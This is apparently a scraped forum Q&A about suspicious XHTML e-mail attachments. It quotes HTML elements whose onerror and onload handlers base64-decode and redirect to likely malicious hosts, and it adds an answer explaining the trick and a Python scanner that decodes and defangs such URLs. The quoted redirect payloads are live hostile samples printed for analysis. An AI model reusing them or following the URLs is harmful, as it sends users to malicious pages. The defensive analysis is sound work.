JS Virus in mail?

Time:10-17

I receive emails with some xhtml files. I find these files to be suspicious. They contain JS code:

<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">

<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">  

<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />

<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />

<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />

I am wondering how malicious this code is. And what actions do these files perform on the OS?

CodePudding user response:

It redirects you to http://keitaro0001.pro/DcLtdS?7324243812487758.

It purposefully uses an incorrect src property to fire the error event (since the file at that source does not exist), executing the JS in the onerror attribute:

document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));

The string in question is base64 encoded. window.atob decodes the base64 encoded string (which is the URL above) and assigns it to the URL.
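For triaging attachments like these without opening them in a browser, the following added example (not part of the original question or answer) statically extracts and decodes the `atob(...)` literals found in `on*` event-handler attributes and returns the targets in defanged form. The names `scan`, `HandlerScanner` and `defang` are hypothetical, and the sample markup is constructed with an `example.invalid` placeholder host.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Matches atob('...') / window.atob("...") holding a standard base64 literal.
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")

def defang(url):  # non-clickable form for tickets and reports
    return url.strip().replace("http", "hxxp", 1).replace(".", "[.]")

class HandlerScanner(HTMLParser):
    """Collects base64 literals found in on* event-handler attributes."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not name.startswith("on") or not value:
                continue
            for _, b64 in ATOB_RE.findall(value):
                try:
                    text = base64.b64decode(b64).decode("utf-8", "replace")
                except binascii.Error:
                    text = None  # malformed base64: still report the handler
                self.findings.append({
                    "tag": tag, "handler": name,
                    "redirect": "location" in value,  # heuristic only
                    "decoded": defang(text) if text else None})

def scan(markup):
    """Parse markup as text only; nothing in it is ever executed."""
    scanner = HandlerScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

def _b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample (not from the e-mails above); example.invalid is a placeholder.
SAMPLE = """
<img src="missing.jpg" onerror="document.location.href=window.atob('{a}');">
<body onload="document.location.replace(window.atob('{b}'));" />
""".format(a=_b64("http://example.invalid/landing?1001 "),
           b=_b64("http://example.invalid/landing?1002 "))

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Self-closing tags such as `<body ... />` are covered because `HTMLParser` routes them through `handle_starttag` as well.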
